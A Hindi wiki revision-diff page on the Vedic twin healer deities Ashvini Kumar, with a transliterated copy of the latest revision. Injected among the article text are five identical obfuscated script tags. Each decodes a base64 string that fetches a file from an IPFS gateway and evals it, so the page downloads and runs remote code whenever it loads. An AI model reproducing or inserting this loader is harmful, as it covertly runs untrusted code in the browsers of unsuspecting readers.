Difference between revisions of "अश्विनीकुमार"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*अश्विनी से उत्पन्न, [[सूर्य देवता|सूर्य]] के औरस पुत्र, दो वैदिक देवता थे।
+
{{बहुविकल्प|बहुविकल्पी शब्द=अश्विनी कुमार|लेख का नाम=अश्विनी कुमार (बहुविकल्पी)}}
*अश्विनी एक कल्याणकारी देवता थे।
+
'''अश्विनीकुमार''' अथवा '''अश्विनी कुमार''' [[सूर्य देवता|सूर्य]] के औरस पुत्र, दो वैदिक देवताओं को कहा जाता है। ये कल्याणकारी देवता हैं। इनका स्वरूप युगल रूप में था। अश्विनीकुमार 'पूषन' के [[पिता]] और 'ऊषा' के भाई कहे गए हैं। इनको 'नासांत्य' भी कहा जाता है।
*अश्विनी का स्वरूप युगल रूप में था।
+
 
*अश्विनी पूषन के पिता और ऊषा के भाई थे।
+
*अश्विनीकुमारों को चिकित्सा के [[देवता]] माना जाता है। ये अपंग व्यक्ति को कृत्रिम पैर प्रदान करते थे। दुर्घटनाग्रस्त नाव के यात्रियों की रक्षा करते थे। युवतियों के लिए वर की तलाश करते थे।
*अश्विनी को 'नासांत्य' भी कहा जाता है।
+
*'पूषन' को पशुओं के देवता के रूप में संबोधित किया गया है। ये देव चिकित्सक थे।
*अश्विनी चिकित्सा के देवता थे। अपंग व्यक्ति को कृत्रिम पैर प्रदान करते थे। दुर्घटनाग्रस्त नाव के यात्रियों की रक्षा करते थे। युवतियों के लिए वर की तलाश करते थे।
+
*उषा के पहले ये रथारूढ़ होकर आकाश में भ्रमण करते हैं और सम्भव है, इसी कारण ये सूर्य-पुत्र मान लिये गये हों।  
*'पूषन' को पशुओं के देवता के रूप मे संबोधित किया गया है।  
 
*ये देव चिकित्सक थे।  
 
*उषा के पहले ये रथारूढ़ होकर आकाश में भ्रमण करते हैं और सम्भव है इसी कारण ये सूर्य-पुत्र मान लिये गये हों।  
 
 
*एक का नाम 'नासत्य' और दूसरे का नाम 'द्स्त्र' है।
 
*एक का नाम 'नासत्य' और दूसरे का नाम 'द्स्त्र' है।
*पुराणों के अनुसार [[नकुल]] और [[सहदेव]] इन्हीं के अंश से उत्पन्न हुए थे।  
+
*पुराणों के अनुसार [[पाण्डव]] [[नकुल]] और [[सहदेव]] इन्हीं के अंश से उत्पन्न हुए थे।  
 
*निरूक्तकार इन्हें 'स्वर्ग और [[पृथ्वी देवी|पृथ्वी]]' और 'दिन और रात' के प्रतीक कहते हैं।  
 
*निरूक्तकार इन्हें 'स्वर्ग और [[पृथ्वी देवी|पृथ्वी]]' और 'दिन और रात' के प्रतीक कहते हैं।  
*राजा [[शर्याति]] की पुत्री [[सुकन्या]] के पतिव्रत से प्रसन्न होकर महर्षि [[च्यवन]] का इन्होंने वृद्धावस्था में कायाकल्प करा उन्हें चिर-यौवन प्रदान किया था।  
+
*[[शर्याति|राजा शर्याति]] की पुत्री [[सुकन्या]] के पतिव्रत से प्रसन्न होकर महर्षि च्यवन का इन्होंने वृद्धावस्था में कायाकल्प करा उन्हें चिर-यौवन प्रदान किया था।
*चिकित्सक होने के कारण इन्हें देवताओं का यज्ञ भाग प्राप्त था।  
+
*चिकित्सक होने के कारण अश्विनीकुमारों को देवताओं का यज्ञ भाग प्राप्त नहीं था। च्यवन ने [[इन्द्र]] से इनके लिए संस्तुति कर इन्हें यज्ञ भाग दिलाया था।  
*च्यवन ने [[इन्द्र]] से इनके लिए संस्तुति कर इन्हें यज्ञ भाग दिलाया था।  
+
*दध्यंग ऋषि के सिर को इन्होंने ही जोड़ा था, पर [[राम]] के विराट रूप का उल्लेख करते हुए [[मंदोदरी|मन्दोदरी]] ने [[रावण]] के समक्ष इन्हें राम का लघु-अंश बताया था।
*दध्यंग ऋषि के सिर को इन्होंने ही जोड़ा था, पर [[ब्रह्मा]] [[राम]] के विराट रूप का उल्लेख करते हुए [[मंदोदरी|मन्दोदरी]] ने [[रावण]] के समक्ष इन्हें राम का लघु-अंश बताया है।
+
 
 +
 
 +
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{हिन्दू देवी देवता और अवतार}}
 
{{हिन्दू देवी देवता और अवतार}}
Line 20: Line 19:
 
[[Category:पौराणिक चरित्र]]
 
[[Category:पौराणिक चरित्र]]
 
[[Category:पौराणिक कोश]][[Category:प्रसिद्ध चरित्र और मिथक कोश]]
 
[[Category:पौराणिक कोश]][[Category:प्रसिद्ध चरित्र और मिथक कोश]]
[[Category:हिन्दू देवी-देवता]]
+
[[Category:हिन्दू देवी-देवता]][[Category:महाभारत]]
[[Category:महाभारत]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 11:42, 28 July 2021

chitr:Disamb2.jpg ashvini kumar ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- ashvini kumar (bahuvikalpi)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

ashvinikumar athava ashvini kumar soory ke auras putr, do vaidik devataoan ko kaha jata hai. ye kalyanakari devata haian. inaka svaroop yugal roop mean tha. ashvinikumar 'pooshan' ke pita aur 'oosha' ke bhaee kahe ge haian. inako 'nasaanty' bhi kaha jata hai.

  • ashvinikumaroan ko chikitsa ke devata mana jata hai. ye apang vyakti ko kritrim pair pradan karate the. durghatanagrast nav ke yatriyoan ki raksha karate the. yuvatiyoan ke lie var ki talash karate the.
  • 'pooshan' ko pashuoan ke devata ke roop mean sanbodhit kiya gaya hai. ye dev chikitsak the.
  • usha ke pahale ye ratharoodh hokar akash mean bhraman karate haian aur sambhav hai, isi karan ye soory-putr man liye gaye hoan.
  • ek ka nam 'nasaty' aur doosare ka nam 'dstr' hai.
  • puranoan ke anusar pandav nakul aur sahadev inhian ke aansh se utpann hue the.
  • nirooktakar inhean 'svarg aur prithvi' aur 'din aur rat' ke pratik kahate haian.
  • raja sharyati ki putri sukanya ke pativrat se prasann hokar maharshi chyavan ka inhoanne vriddhavastha mean kayakalp kara unhean chir-yauvan pradan kiya tha.
  • chikitsak hone ke karan ashvinikumaroan ko devataoan ka yajn bhag prapt nahian tha. chyavan ne indr se inake lie sanstuti kar inhean yajn bhag dilaya tha.
  • dadhyang rrishi ke sir ko inhoanne hi jo da tha, par ram ke virat roop ka ullekh karate hue mandodari ne ravan ke samaksh inhean ram ka laghu-aansh bataya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>